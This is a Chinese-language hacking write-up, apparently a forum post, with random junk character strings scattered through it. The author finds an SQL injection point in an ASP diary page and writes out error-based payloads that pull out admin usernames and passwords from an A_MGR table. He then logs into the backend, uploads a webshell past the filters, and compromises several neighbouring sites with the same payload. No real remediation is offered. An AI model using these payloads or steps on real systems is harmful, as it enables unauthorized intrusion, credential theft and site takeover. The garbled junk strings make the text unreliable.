发现一个注入点
8 \; s9 X' k" c4 vhttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
7 P5 z1 ~3 H) X5 f- u
# ?5 B/ m/ D- O6 T7 |" D习惯性的加’having1=1--
/ Y, f" C% }9 o
; y0 R+ ]7 G0 X/ fhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—# i/ W9 i- M! ]+ ?; D8 }7 _, ^" C
. d8 X s/ b, n( J- x7 ~) A
0
0 \* Q) K8 w6 l/ h8 Q* t
, w ]0 W0 f0 Z8 n" l: ~" Q爆出Diary_A.dl_Title(这时候很激动啊)5 ^. r1 C% F7 [0 x* t
; J# c. F( A, s @1 L9 V那么继续
# T1 F/ L" ]9 ~" }& |9 X# a' x& V! ?9 lhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
. a E1 g7 g% X/ R, O
* N. X3 [9 ~5 m9 U继续,一直爆下去7 I3 d6 x g) L6 f0 q4 a1 [9 |
( r6 U) |9 a f8 E& M5 H/ C
爆到几个字段和表段 但是没找到需要的管理用户的字段! ~9 A' B$ S! t: Q
$ F0 [# w8 k6 ?& g
蛋疼了 怎么办 然后去后台登陆页看源码
0 I7 {, x) P: g3 A, s: K, V) I2 {8 A& `: n
0
@+ J M8 b- @5 o" E
. c9 ]8 k4 o, x& Z: c! B' P- A) CInput name= “ADUID”
" Q2 ^, D. i% U) pInput name= “ADPWD”
% U1 `* j, p2 E [ g
1 s2 \# H# R$ c: n很幸运 找到了字段那就继续# ]4 L0 ]. G2 E& s
找到之后开始爆用户* W7 W8 g% G& M. b2 h/ s
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
- E' z6 e; V' @. l* L! @爆密码7 o& B! [0 s/ p: Y" @
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—8 f& z. Z) ^9 b' [1 k1 e
测试了下 这个注入点只能爆到文章哪里的表
& ]) e2 U- M( Y5 a P
" c& h+ V" J* S$ f5 s4 n. U1 L/ E j头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了 Y1 \% i5 y/ X0 y# I( D& K
+ a! A( u& g) Q+ }, m% R& o
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
( Q4 v: A8 Z1 J) G7 I1 Z# w# L* D1 S
473& ^1 |1 l0 h8 x5 v
/ l `$ F* D( d& R! g0 U) g! x进后台
, u6 q6 o; {/ `) d
: ~/ D4 M# C9 P3 c' Z! B0 |+ f, y+ o# ~' V
发现几个上传点 有的地方不能上传 而且防止恶意代码
6 t' @2 r1 l2 I
. T; e/ W8 K3 o没办法 各种百度各种找大牛 找到一只好像可以突破的马
4 z( \$ ] R- R* w* q+ H; v* m
' s- s" I9 W; J9 P) D, A2 u2 I
在系统管理那里直接上传 不过没有显示地址
9 i/ M* d" D W
$ N0 N0 h- j" u! o& M. P再上传一次 抓包 搞定OK
9 @- Z) V9 s' k- _' u( c% Z# A
. {' B! l" t! k- @- \
. K' t( l$ q3 }! O' }# F. b! ]9 o' w/ k6 I- E; F) X
4722 x* p4 A6 a' V: a s
8 [: e& t! i7 _# G
晚上不行了 去睡觉。。。
: @$ f- x. m3 J8 |第二天刚起床 闲的没事做继续日站吧 ' m, {9 d5 [3 T1 C+ v: ]0 o
6 o- n3 s; y% F7 H+ F找个站 就把这个站的旁c扫了下
2 ^9 z# O0 U3 N0 i' F9 Y- r+ Z# k( `/ u' ?
发现c段也有一个购物站 ,然后还和这个站的模板差不多
7 ~8 e4 h5 P, l; I9 N c) J5 t8 _$ r, D$ C# K' M% @/ t
就找到会员登录口测试 q6 T: Q4 h7 Q! \( J
& K0 M& {6 j+ u7 w& _
'and (select top 1 MGR_UID from A_MGR)>0—& L& P R5 z g1 j% g
果断爆到了 这时候我很激动 通杀
0 {* D- Y4 S/ S0 r
' r- F* ^& v( |8 d再次翻c段
5 Z8 r& n; z: ?2 I9 |# p$ F. {1 h4 {7 {; C
翻出几个站 都成功拿下
; C+ S5 ]8 Z' e# E' x# S' q7 [" D% }1 b( d, w' h& Q+ n
/ {0 t9 ], m: z! o+ b& s/ b
) t2 V y, K" q% f修复方案:" d4 y$ |- q! K+ z
他们比我专业 1 e* N) T8 j f$ @
4 l- m. O" _; b' D$ [/ {( I
- i n5 W9 d$ ?% M& x$ z% _. c3 K* `) M4 N! ?3 i
|